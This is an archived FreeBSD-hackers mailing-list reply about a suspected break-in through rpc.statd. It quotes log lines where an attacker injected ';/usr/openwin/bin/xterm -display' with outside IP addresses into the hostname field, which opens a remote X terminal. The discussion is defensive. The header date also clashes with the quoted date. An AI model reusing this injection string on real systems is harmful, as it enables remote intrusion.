Date: Sat, 21 Feb 1998 17:10:34 +1100 (EST) From: <nick@feralmonkey.org> To: Greg Lehey <grog@lemis.com> Cc: FreeBSD Hackers <hackers@freebsd.org>, FreeBSD-isp@freebsd.org Subject: Re: New breakin technique? Message-ID: <Pine.BSF.4.05.9802211709170.6407-100000@shibumi.feralmonkey.org> In-Reply-To: <19990221141243.G93492@lemis.com>
next in thread | previous in thread | raw e-mail | index | archive | help
There has been issues with statd on both solaris and linux. It may simply be someone running a mass-scan. Nick On Sun, 21 Feb 1999, Greg Lehey wrote: > I've just found the following messages in my logs: > > Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0; > > Has anybody seen something like this? It looks as if somebody is > trying to break in, but I didn't know that rpc.statd could start > xterms. > > Under these circumstances, it would be interesting to know if > rpc.statd *must* run as root. Wouldn't, say, bin be enough? > > Greg > -- > See complete headers for address, home page and phone numbers > finger grog@lemis.com for PGP public key > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.05.9802211709170.6407-100000>